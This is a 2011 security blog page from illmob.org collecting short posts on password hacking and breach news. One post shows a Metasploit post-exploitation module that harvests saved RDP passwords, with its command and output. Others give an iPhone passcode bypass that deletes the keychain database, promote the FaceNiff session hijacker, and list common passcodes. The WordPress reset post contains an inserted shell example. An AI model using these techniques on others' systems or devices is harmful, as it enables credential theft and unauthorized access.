illmob.org

xkcd: Password Strength

August 10th, 2011 by admin in Life

Metasploit .RDP password module

August 2nd, 2011 by admin in Our Tools, Password Info

Just finished a new module for Metasploit meterpreter post-exploitation.
Once you gain a meterpreter session, just run:
run post/windows/gather/enum_rdp_pwd

meterpreter > run post/windows/gather/enum_rdp_pwd

[*] Searching for *.rdp files in C:\Users\Will\Documents

[*] Found: C:\Users\Will\Documents\Default.rdp
[*] Host: 10.1.10.8
[*] User: Administrator
[*] Pass: metasploit


Top 10 iPhone unlock codes

June 16th, 2011 by admin in Apple, Password Info

In his last update to Big Brother Camera Security, Daniel Amitay added some code to record common user passcodes. Because Big Brother’s passcode setup screen and lock screen are nearly identical to those of the actual iPhone passcode lock, Daniel figured that the collected information would closely correlate with actual iPhone passcodes. Out of 204,508 recorded passcodes, the top ten most common were:
[1234, 0000, 2580, 1111, 5555, 5683, 0852, 2222, 1212, 1998]

Source: amitay.us

Faceniff – Session Jacker for Android

June 2nd, 2011 by admin in Browsers, Life, Mobile

FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to.
It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK).
It’s kind of like Firesheep for Android. Your phone must be rooted to use this program.
Originally it started off for just Facebook, but the author has added support for these other sites: Facebook, Twitter, YouTube, Amazon, Nasza-Klasa.

LastPass resets passwords following possible hack

May 5th, 2011 by admin in News

Password management system LastPass has reset users’ master passwords as a precaution following the discovery of a possible hack attack against its systems.

The move follows the detection of two anomalies – one affecting a database server – on LastPass’s network on Tuesday that could be the result of a possible hack attack. LastPass detected that more traffic had been sent from the database than had been received by a server, an event that might be explained by hackers extracting sensitive login credentials, stored in an obfuscated (hashed) format.

The worst case scenario is that miscreants might have swiped password hashes, a development that leaves users who selected easier-to-guess passphrases at risk of brute-force dictionary attacks. Once uncovered, these login credentials might be used to obtain access to all the login credentials stored through the service, as LastPass explains in a blog post (extract below).

If you have a strong, non-dictionary-based password or pass phrase, this shouldn’t impact you – the potential threat here is brute-forcing your master password using dictionary words, then going to LastPass with that password to get your data. Unfortunately not everyone picks a master password that’s immune to brute-forcing. To counter that potential threat, we’re going to force everyone to change their master passwords. Additionally, we’re going to want an indication that you’re you, by either ensuring that you’re coming from an IP block you’ve used before or by validating your email address…

We realise this may be an overreaction and we apologise for the disruption this will cause, but we’d rather be paranoid and slightly inconvenience you than to be even more sorry later.

LastPass’s decision to reset passwords as a precaution has made it difficult for some legitimate users to log onto the service again. Tips on re-enabling accounts can be found in a blog post by Chris Boyd, a security researcher at GFI Software, here.

The password-management outfit has taken the possible attack and resulting service disruption as the opportunity to introduce a stronger password hashing system. Although LastPass isn’t sure how hackers might have entered its network – if indeed that’s what happened – an assault based on an initial break-in via its Voice over IP system is the company’s best initial guess as to what might have gone wrong.

This week’s security flap at LastPass.com follows a security breach just six weeks ago that created a means to extract the email addresses – though not the passwords – of enrolled users. The two incidents are not thought to be related.

 

Source: theregister.co.uk

Sony: PSN Personal Info Was Stolen

April 29th, 2011 by admin in News

UPDATE: We received a small chunk of the compromised passwords, check to see if your name is on this list

Sony has some bad news for PSN users, confirming that PSN personal information is “believed” to be in the hands of an “unauthorized person.” Users who use the same password for multiple accounts should make immediate changes to all of their online accounts.

Sony has confirmed that the PSN outage caused by what it called an “external intrusion” a few days ago has resulted in the theft of the personal information of the roughly 70 million active PSN accounts. A post today on the PlayStation Blog by Senior Director of Corporate Communications and Social Media Patrick Seybold said that as early as April 17 account information may have been stolen.

“We have discovered that between April 17 and April 19, 2011, certain PlayStation Network and Qriocity service user account information was compromised in connection with an illegal and unauthorized intrusion into our network,” Seybold wrote.

There is a laundry list of compromised personal information, including the loss of logins, passwords, street addresses, and purchase histories. Even credit card information could be at risk, though Sony says there is “no evidence” that theft of credit card information occurred.

Although we are still investigating the details of this incident, we believe that an unauthorized person has obtained the following information that you provided: name, address (city, state, zip), country, email address, birthdate, PlayStation Network/Qriocity password and login, and handle/PSN online ID. It is also possible that your profile data, including purchase history and billing address (city, state, zip), and your PlayStation Network/Qriocity password security answers may have been obtained. If you have authorized a sub-account for your dependent, the same data with respect to your dependent may have been obtained. While there is no evidence at this time that credit card data was taken, we cannot rule out the possibility. If you have provided your credit card data through PlayStation Network or Qriocity, out of an abundance of caution we are advising you that your credit card number (excluding security code) and expiration date may have been obtained (emphasis added).

In response to the intrusion, Seybold wrote that Sony turned off the PSN, contacted an outside security firm for assistance, and quickly stepped up efforts to strengthen PSN infrastructure.

Change your passwords, keep careful note of charges to your accounts, and keep an extra eye out for things out of place with your personal accounts. Stay tuned to gamrFeed for further updates.

Source: PlayStation Blog

eXcon and BSidesCT Security conference

April 27th, 2011 by admin in News

Tickets are on sale now for eXcon and BSidesCT security conference.
June 11th, 2011, located in Meriden, CT.
It’s only 2 hrs from either Boston or NYC.
http://exconference.com
If you want to attend or speak at the conference hit their email up on the site!!!

5 Easy Steps to Reset WordPress Password

April 6th, 2011 by admin in Password Info

These steps use phpMyAdmin and the WordPress database to reset your password.

Step 1: Go to your Website Control Panel and open phpMyAdmin.

Step 2: While in phpMyAdmin, select your WordPress database and select the wp_users table (this is the table that holds all of your usernames).

WordPress Database Tables

Step 3: Select your username from the list and click the EDIT icon.

Choose your username

Step 4: WordPress stores users’ passwords as MD5 hashes, so to change the password we must first turn it into an MD5 hash.
If you are on Linux, you can run:

# single quotes keep $# literal; printf '%s' avoids the trailing newline a here-string would add to the hashed input
printf '%s' 'MyPassword789456321$#' | md5sum

Copy the generated MD5 hash code, go back to the EDIT user page which you opened in Step 3, paste the MD5 hash in the “user_pass” box and click “Go”.

Paste the MD5 Hash Code

Now, your WordPress Admin Password should be changed.
Go to http://yoursite.com/wp-admin/ and login with your new password.
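
The hash pasted in Step 4 must be the MD5 of exactly the password's bytes. The following is an added example, not part of the original post, showing two shell pitfalls that silently produce a different hash: a trailing newline on the input and `$#` expanding inside double quotes. The function names and the sample password are constructed for illustration.

```shell
# Added example, not from the original post. wp_md5, herestring_md5 and
# double_quoted_sample are hypothetical helper names; passwords are constructed.

# Hash exactly the bytes of the password: printf '%s' adds no trailing newline.
wp_md5() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# What a here-string (md5sum <<<"...") or plain echo feeds md5sum:
# the password plus "\n", which is a different input and a different digest.
herestring_md5() {
    printf '%s\n' "$1" | md5sum | cut -d' ' -f1
}

# Inside double quotes the shell replaces $# with the argument count
# (0 here, since the function is called without arguments).
double_quoted_sample() {
    printf '%s' "MyPassword789456321$#"
}

pw='MyPassword789456321$#'   # single quotes: $# stays literal

echo "literal password       : $pw"
echo "double-quoted expansion: $(double_quoted_sample)"
echo "hash to paste          : $(wp_md5 "$pw")"
echo "here-string hash       : $(herestring_md5 "$pw")"

# A login with the intended password only works if the stored digest is the
# first one; report which of the two pitfalls would have changed it.
if [ "$(wp_md5 "$pw")" != "$(herestring_md5 "$pw")" ]; then
    echo "trailing newline changes the digest"
fi
if [ "$(wp_md5 "$pw")" != "$(wp_md5 "$(double_quoted_sample)")" ]; then
    echo "\$# expansion changes the digest"
fi
```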

I need a new ride

April 4th, 2011 by admin in Uncategorized

Ducati Diavel ignition starts with password only, with no key. The password is last 4 of VIN on all models.

iPhone Password Bypass

March 25th, 2011 by admin in Apple

The following tutorial explains how to access an iPhone, iPad or iPod which is password protected.

If you are a Windows user, just download the free software iPhone Browser: http://www.brothersoft.com/iphonebrowser-download-190579.html

Connect the device {iPhone,iPod,iPad} and go to the following location.

var/keychains and delete the file, keychain-2.db

Once done, restart the device by pressing and holding the home button + sleep button for 10 sec. Release when you see the black screen, then after 3 sec press the sleep/power button once.

Your iDevice will boot up, but this time it will not ask for the password, as we have deleted the database record for the password.
